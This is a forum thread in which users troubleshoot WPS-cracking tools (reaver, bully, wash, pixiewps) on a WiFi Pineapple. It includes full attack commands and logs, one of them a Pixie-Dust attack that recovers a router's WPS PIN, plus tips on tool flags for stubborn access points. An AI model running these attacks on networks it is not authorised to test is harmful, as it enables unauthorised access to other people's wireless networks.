Marco Rossi Posted July 29, 2015

Wash and bully work with the disabled wlan1, though I have to prevent WPS lockout somehow.

    root@WIN7B2:~# bully mon0 -b A0:F3:B2:E4:3A:62 -e "myAP" -c 4
    [!] Bully v1.0-22 - WPS vulnerability assessment utility
    [+] Switching interface 'mon0' to channel '4'
    [!] Using '00:15:25:94:44:11' for the source MAC address
    [+] Datalink type set to '127', radiotap headers present
    [+] Scanning for beacon from 'a0:f3:b2:e4:3a:62' on channel '4'
    [+] Got beacon for 'myAP' (a0:f3:b2:e4:3a:62)
    [+] Loading randomized pins from '/root/.bully/pins'
    [+] Index of starting pin number is '0000000'
    [+] Last State = 'NoAssoc' Next pin '44421090'
    [+] Rx( M5 ) = 'Pin1Bad' Next pin '50901098'
    [+] Rx( Auth ) = 'Timeout' Next pin '50901098'
    [+] Rx( Assn ) = 'Timeout' Next pin '50901098'
    [+] Rx( Auth ) = 'Timeout' Next pin '50901098'
    [+] Rx( Assn ) = 'Timeout' Next pin '50901098'
    [+] Rx( Assn ) = 'Timeout' Next pin '50901098'
    [!] Received M2D or out of sequence WPS Message
    [+] Rx( M5 ) = 'WPSFail' Next pin '50901098'
    [+] Rx( Auth ) = 'Timeout' Next pin '50901098'
    [+] Rx( Assn ) = 'Timeout' Next pin '50901098'
    [+] Rx( Assn ) = 'Timeout' Next pin '50901098'
    [+] Rx( M5 ) = 'Pin1Bad' Next pin '10541098'
    [+] Rx( Auth ) = 'Timeout' Next pin '10541098'
    [+] Sent packet not acknowledged after 3 attempts
    [+] Tx( Auth ) = 'Timeout' Next pin '10541098'
    [+] Rx( Assn ) = 'Timeout' Next pin '10541098'
    [+] Rx( Assn ) = 'Timeout' Next pin '10541098'
    [+] Rx( Auth ) = 'Timeout' Next pin '10541098'
    [+] Rx( M5 ) = 'Pin1Bad' Next pin '11481096'
    [+] Rx( Auth ) = 'Timeout' Next pin '11481096'
    [+] Rx( Assn ) = 'Timeout' Next pin '11481096'
    [+] Rx( M5 ) = 'Pin1Bad' Next pin '85851092'
    [!] WPS lockout reported, sleeping for 43 seconds ...
    [!] WPS lockout reported, sleeping for 43 seconds ...

    Current Disk Usage:
    Filesystem            Size     Used  Available  Use%  Mounted on
    rootfs                3.2M   740.0K       2.5M   23%  /
    /dev/root            11.8M    11.8M          0  100%  /rom
    tmpfs                30.2M   124.0K      30.1M    0%  /tmp
    tmpfs               512.0K        0     512.0K    0%  /dev
    /dev/mtdblock3        3.2M   740.0K       2.5M   23%  /overlay
    overlayfs:/overlay    3.2M   740.0K       2.5M   23%  /
    /dev/sdcard/sd1       2.8G   106.0M       2.5G    4%  /sd

    Current Memory Usage:
                   total     used     free   shared  buffers
    Mem:           61804    43664    18140        0     6152
    -/+ buffers:            37512    24292
    Swap:        1000132        0  1000132

Here is my disk usage. Unfortunately reaver still gives me the same errors as before. Thanks for the help.

Marco Rossi Posted July 31, 2015

Okay, doing a wash scan via ssh, try taking down the monitor mode enabled device before using wash / reaver / bully. After another reset I installed reaver and bully on the sd card but either cannot associate or never sends a pin.

    mkdir /etc/reaver
    opkg update
    opkg -d sd install reaver
    ln -s /sd/etc/reaver/reaver.db /etc/reaver/
    ln -s /sd/usr/bin/reaver /usr/bin/
    ln -s /sd/usr/bin/wash /usr/bin/

chrisonline909 Posted August 31, 2015

Hello guys, I'm having an issue with reaver not getting the correct information from the AP to do a successful reaver attack. I've tried the same AP on Kali and it gets the pin and pass phrase. Any help would be appreciated!! Thank you.

    root@Pineapple:~# reaver -i wlan1mon -c7 -b XX:XX:XX:53:12:6C -vvv -K 1

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

    [+] Switching wlan1mon to channel 7
    [+] Waiting for beacon from XX:XX:XX:53:12:6C
    [+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 1142bb9d3b345c4655f269e279a47ac8
    [P] PKE: d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
    [P] WPS Manufacturer: Belkin International
    [P] WPS Model Name: Belkin N600DB Wireless Router
    [P] WPS Model Number: F9K1102 v2
    [P] Access Point Serial Number: 20422GF2204541
    [+] Received M1 message
    [P] R-Nonce: aa2e55a0e5abae5201c8c664efb46df6
    [P] PKR: 4c24122323090189f6e58696e76769aceff61432b8aa4fcea7ff12eeaefd42cd52d2a56077452875df2419e0544192ad03287838d6e1811c887f123b1e87e2a00863e1b6a93216677e8e9f7f1f6280ba8eb13dbf2a56eb30478636bf4fa650bdbb436c7dbf198b622ff10e505a66d7e6452eb2fe25c7b06f448d4d79681adfd28f30395c656bf1ac5295f1ecfaf0bd0966497e1cf11ce02f0a6f6033e8fd66e3f6affdf0f5f42ded54ee7e61c3add7b810b6178e941d0a78b3384aeb61925d51
    [P] AuthKey: 6111f2697163f20b7a7aee495b94b8ccd3f080904c0038765e0cbd91e057f393
    [+] Sending M2 message
    [P] E-Hash1: dd1337c644e08b60bdedd33c558ec78713364d3ea7a76d110f49a886f39918b4
    [P] E-Hash2: d437d4e3a0bcb16bcb4124162e6f5ccd21e5a3a5d5ed2d8e0a483c79113ddf4e
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust] [*] Time taken: 12 s 80 ms
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    [+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    root@Pineapple:~#

    root@kali11:/home/chris# reaver -i wlan1mon -c 7 -b XX:XX:XX:XX:XX:XX -vvv -K 1

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

    [+] Switching wlan1mon to channel 7
    [+] Waiting for beacon from XX:XX:XX:53:12:6C
    [+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 3e:2b:ce:1b:1d:a2:da:88:6f:b1:ea:f9:0e:7f:12:c5
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Belkin International
    [P] WPS Model Name: Belkin N600DB Wireless Router
    [P] WPS Model Number: F9K1102 v2
    [P] Access Point Serial Number: 20422GF2204541
    [+] Received M1 message
    [P] R-Nonce: 5b:95:e2:eb:9e:ee:fb:be:b3:d8:23:8e:83:8a:1e:45
    [P] PKR: 51:aa:9d:86:4e:69:69:00:b7:c1:63:ae:4c:88:fb:00:80:25:be:06:e1:ec:27:49:51:25:cd:9f:7b:56:19:a3:de:98:ee:98:e8:f5:ae:90:3e:68:14:12:0f:de:5b:b9:c9:f3:69:9b:e8:d8:29:a1:7d:c8:9b:86:c1:d1:17:40:2c:ea:69:74:70:91:74:c2:b7:49:1e:00:ce:8a:de:9e:e0:b1:e8:bb:d7:64:96:9f:d3:d6:e6:a2:09:af:da:c2:af:a2:3f:7d:02:db:d2:1b:65:c9:ef:ef:f6:ca:af:4f:d4:0e:43:53:10:01:ca:d8:73:40:57:8a:b1:26:d3:fc:2d:85:cf:2f:59:53:89:cb:e2:00:ca:b6:6d:d4:3b:c3:fe:70:7c:36:6d:9e:0c:db:f6:0a:f0:96:fc:d3:1a:ac:23:34:d2:e9:4c:4f:87:d7:77:82:bc:2c:5d:20:d7:df:1f:f8:a1:44:4b:5a:50:25:d0:a4:fb:3d:15:b4:11:06
    [P] AuthKey: bb:74:56:24:e7:dd:ac:a7:8a:09:1e:a2:d9:60:ec:43:83:66:59:16:e7:3e:36:dd:57:9a:33:30:51:ea:86:3c
    [+] Sending M2 message
    [P] E-Hash1: af:c3:d0:f7:e9:b8:8f:16:37:89:bf:79:24:1e:99:d9:0f:8e:ce:2e:2c:9b:14:9c:a3:7c:74:4b:a9:eb:03:75
    [P] E-Hash2: 9b:9f:14:f8:55:90:5d:b6:18:8d:93:7b:86:e1:f0:5e:d7:34:ed:a3:06:4e:6b:0a:37:8b:e5:ab:ed:a0:d3:b3
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [*] E-S1: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15
    [Pixie-Dust] [*] E-S2: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15
    [Pixie-Dust] [+] WPS pin: 14987236
    [Pixie-Dust]
    [+] Running reaver with the correct pin, wait ...
    [+] Cmd : reaver -i wlan1mon -b 94:10:3E:53:12:6C -c 7 -s y -vv -p 14987236
    [Reaver Test] [+] BSSID: XX:XX:XX:53:12:6C
    [Reaver Test] [+] Channel: 7
    [Reaver Test] [+] WPS PIN: '14987236'
    [Reaver Test] [+] WPA PSK: 'XXXXXXXX'
    [Reaver Test] [+] AP SSID: 'XXXXXX'

ghostheadx2 Posted December 30, 2015

For me it tries the same pin over and over. How do I change the arguments so it doesn't ignore it and tries a new pin even if it doesn't get a nack?

AlfAlfa Posted December 30, 2015

> for me it tries the same pin over and over. how do I change the arguments so it doesn't ignore it and tries a new pin even if it doesn't get a nack

I'm not sure that you can... Have you tried playing around with the arguments though? For picky access points I've found -N for no nacks helps, and increasing delays. Even the -n for other nack related... Maybe -w act like a windows registrar...

I know I've had that feeling too that, maybe it is getting it, just not telling me... However when changing it to the correct pin, and it's still failing, well maybe the access point is being clever or something...

I've also noticed sometimes you have to manually associate with aireplay-ng as for some reason reaver itself has trouble associating with certain APs...

Basically exhaust all possibilities with the switches!

Ted_ Posted January 27, 2016

I've been trying to get reaver working on the nano for about 5 hours now... Wash reports nothing with WPS, Airodump does. Reaver is working from another device on my router, just not from the nano. I've tried using external NICs on the Pineapple as well, I'm using the version in the Pineapple's repos. I've also tried taking wlan1 down before and after and doing airmon-ng check kill, trying all parameters in wash. Any ideas?

    CH  6 ][ Elapsed: 12 s ][ 2016-01-27 08:08

    BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  WPS  ESSID

    10:6F:3F:62:04:59  -58  100      135   1510  102   6  54e  WPA2  CCMP    PSK   1.0  Buffalo Soldier

    BSSID              STATION  PWR  Rate  Lost  Frames  Probe

    root@Pineapple:/usr/lib# wash -i wlan1mon

    Wash v1.5.2 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

    BSSID  Channel  RSSI  WPS Version  WPS Locked  ESSID
    --------------------------------------------------------------------------------------

    root@Pineapple:/usr/lib# reaver -i wlan1mon -b 10:6F:3F:62:04:59 -c 6

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

    [+] Waiting for beacon from 10:6F:3F:62:04:59
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [+] Associated with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
    [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)

zabses Posted May 22, 2016

Hello! Share please Make file for reaver_Big_endian-2

ZaraByte Posted May 22, 2016

37 minutes ago, zabses said:
> Hello! Share please Make file for reaver_Big_endian-2

To be honest you can use a tool called https://github.com/aanarchyy/bully with a bit of work.

zabses Posted May 23, 2016

15 hours ago, ZaraByte said:
> To be honest you can use a tool called https://github.com/aanarchyy/bully with a bit of work.

Thank you, I know about the bully and collected me it is firmware I would like to raise it with openwrt reaver_Big_endian-2

P.S. Sorry for my english (google translator)

omzer Posted July 22, 2016

Same, reaver does not associate. Bully gets the timeouts. Seems to work on kali and card ok...

mile18 Posted March 24, 2017

Can someone please put Makefile for pixiewps because I can't find it anywhere :(

zabses Posted March 24, 2017

4 hours ago, mile18 said:
> Can someone please put Makefile for pixiewps because I can't find it anywhere :(

https://github.com/wiire/pixiewps/blob/master/Makefile